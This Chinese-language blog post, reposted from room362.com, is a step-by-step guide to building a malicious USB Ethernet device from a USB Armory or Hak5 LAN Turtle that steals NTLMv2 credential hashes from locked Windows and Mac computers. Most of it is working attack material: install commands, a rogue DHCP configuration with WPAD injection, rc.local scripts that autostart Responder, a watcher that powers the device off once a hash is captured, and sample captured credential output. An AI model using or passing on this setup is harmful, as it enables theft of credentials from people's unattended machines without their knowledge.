K1two2's Geek Hub


NEET
Independent Researcher
使用恶意USB设备解锁 Windows & Mac 锁屏状态

NSA专业物理入侵设备——USB Armory,可解锁任意锁屏状态的下的Windows和Mac操作系统,含最新发布的Windows10、及较早的Mac OSX El Capitan / Mavericks,想知道原理是什么?进来看看吧!

首先,这原本是没有可能实现的,但事实是我真的办到了(相信我,因为不敢相信这是真的,我已经测试了很多次。)

USB Ethernet + DHCP + Responder == 证书

论题:

如果我在电脑上插入一个伪装成USB以太网适配器的设备, 那么即使这个系统是锁定的,我也可以从系统中获取证书。(也许还能做更多的事情,但这篇文章已经太长,我们会在之后另外讨论。)

1.设备的设置

在文章一开始,我是用一个USB Armory (155美元)进行实验的,但在下文中,我也会向你们展示如何用Hak5 Turtle(49.99美元)实现这一目的。

我将会为你们提供设备本身的设置信息,下面还有一些可以为你们提供帮助的链接:

USB Armory Bundle

Hak5 LAN Turtle

2.工具

基本上,运用Laurent Gaffié的响应器可以完成捕获,所以你需要找到一个方法来将应答器映射到设备上,而Hak5 Turtle已经有这样的一个模块了:

首次使用时,你必须将模块设置为“Enable”,随后它会自行下载所有相关项和软件包。

然后你还需要一个opkg update和opkg install python-openssl,这样应答器就可以正确运行了。

至于USB Armory,你可以使用SCP、网络连接共享、USB主机/客户端适配器:

在Debian/Jessie的默认安装中没有安装Python,所以你必须解决所有的相关项(在Kali版本中不需要这个),并且需要互联网接入来执行以下内容:

apt-get install -y python git python-pip python-dev screen sqlite3
pip install pycrypto
git clone https://github.com/spiderlabs/responder

3.配置

USB Armory Bundle

首先,设置接口不是必需的,但是因为Armory的每个图像都有着不同的默认IP地址,设置它能够提高一致性, 因此它可以为下一步打下坚实的基础。

/etc/network/interfaces
# interfaces(5) file used by ifup(8) and ifdown(8)
# Include files from /etc/network/interfaces.d:
source-directory /etc/network/interfaces.d
auto usb0
allow-hotplug usb0
iface usb0 inet static
  address 192.168.2.201
  netmask 255.255.255.0
  gateway 192.168.2.1

下面,我们来建立DHCP服务器:

/etc/dhcp/dhcpd.conf
ddns-update-style none;
option domain-name "domain.local";
option domain-name-servers 192.168.2.201;
default-lease-time 60;
max-lease-time 72;
# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
authoritative;
# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;
# wpad
option local-proxy-config code 252 = text;
# A slightly different configuration for an internal subnet.
subnet 192.168.2.0 netmask 255.255.255.0 {
  range 192.168.2.1 192.168.2.2;
  option routers 192.168.2.201;

这里唯一的特殊配置是发送“Proxy Config” 选项到DHCP客户端。请注意这一行:

一篇关于WPAD的维基百科文章中提到:“DHCP的优先级高于DNS:如果DHCP提供了WPAD URL, DNS查找将不会执行。“

接下来,我们需要设置自动运行。我们编辑了rc.local文件,让它来做这样的几件事:

  1. 清理掉所有DHCP租约,并启动DHCP服务器。也许还存在着某种更好的方式,但是因为这台“计算机”被插入和取出得非常频繁,文件在某种程度上可能会损坏,因此我们只是移除并重新添加了它。
  2. 在一个屏幕会话中启动响应器。这样我们就可以得到屏幕会话的记录,作为Sqlite3数据库和应答器创建的日志文件的备份。
/etc/rc.local
#!/bin/sh -e
# Clear leases
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases
# Start DHCP server
/usr/sbin/dhcpd
# Start Responder
/usr/bin/screen -dmS responder bash -c 'cd /root/responder/; python Responder.py -I usb0 -f -w -r -d -F'
exit 0

为了让屏幕会话的日志记录启用(可以让你迅速找出问题),你需要添加一个a .screenrc文件。最重要的部分是:

/root/.screenrc
# Logging
deflog on
logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log

就是这样,现在你应该可以重启USB Armory了,然后开始在任何可以插入USB的地方获取凭证。

Hak5 LAN Turtle

现在,所有的事情几乎都已经完成了,唯一的区别在于opkg是你的软件包管理器:

opkg update
opkg install python-openssl screen

将符号链接移动到/ tmp /,这样日志会被保留下来

rm -rf /overlay/etc/turtle/Responder/logs
/overlay/etc/rc.local文件略有不同
/overlay/etc/rc.local
/etc/init.d/dnsmasq stop
/usr/sbin/screen -dmS responder bash -c 'cd /overlay/etc/turtle/Responder; python Responder.py -I br-lan -f -w -r -d -F'

4.为什么它会奏效?

  1. 因为USB是即插即用的,这就意味着,即使一个系统是锁着的, USB仍然可以被安装。我认为,在新的操作系统中(Win10 / El Capitan),某些类型的设备可以在其锁定状态下进行安装时,是受到限制的,但是Ethernet/LAN肯定在白名单里。
  2. 即使你没有打开任何浏览器或应用程序,电脑也仍在不断地创造流量, 出于某种原因,大多数计算机会信任它们的本地网络。
  3. 网络偏好通常基于Windows上的“metrics”和OSX上metrics和“preference”的结合,但在默认情况下,“wired”和“newer/faster”总能成为赢家。

这意味着, 由于有了应答器,插入设备后,它很快变成了网关、DNS服务器、WPAD服务器等部分。

从插入锁定的工作站到获取到证书,平均需要大约13秒的时间,这完全取决于系统的状况。另外,我使用了inotify来观察Responder.db数据库内文件的改变,并关闭Armory。它还能通过LED给我一个已经获取到了证书的指示。

为此,你需要安装inotify-tools包,并将以下内容添加到therc.local本地文件:

echo "Staring cred watch" >> /root/rc.log
/usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /root/responder/Responder.db; do shutdown -h now; done'

5.最终结果:

你在视频中能看到Windows 10的锁定屏幕。当LED发出指示时,Armory被完全关闭, 证书已经得到了!

观察结果:

root@wpad:~# sqlite3 /root/responder/Responder.db 'select * from responder'
2016-09-04 10:59:43|HTTP|NTLMv2|192.168.2.1||SITTINGDUCK\mubix||5EAEA2859C397D8AE48CA87F:01010000000001E9D23F49F7891F38965D80A0010000000000000000000000000000000900260048005400540050002F007800780066006600730062006E0070006300000000000000....

步骤已完成。

在以下系统中测试成功:

Windows 98 SE

Windows 2000 SP4

Windows XP SP3

Windows 7 SP1

Windows 10 (企业版和家庭版)

OSX El Capitan / Mavericks (我可以在其中得到证书 ,但是我还在测试这是不是一个偶然情况)

我还没有在Linux上测试过, 如果成功了的话,我会另外写一篇文章。

6.USB ARMORY与Hak5 LAN Turtle的比较

  1. Armory更具通用性,是一种不错的用于发动攻击的方式。具有更多的存储空间(SD)和更快的处理器。
  2. 在SE攻击中,如果你试图插入一个设备,Hak5 LAN Turtle更容易完成任务。它可能不像Armory那样,在取得证书时有LED指示,但它有一个可以作为以太网端口的附加功能,因此你可以得到证书和一个shell。

原文地址:https://room362.com/post/2016/snagging-creds-from-locked-machines/

posted on 2016-09-08 22:37  K1two2  阅读(3821)  评论(0编辑  收藏  举报

版权声明:如果网站侵犯了您的合法著作权宜,请发送邮件至我,经核实后,我会在24小时内删除该资源!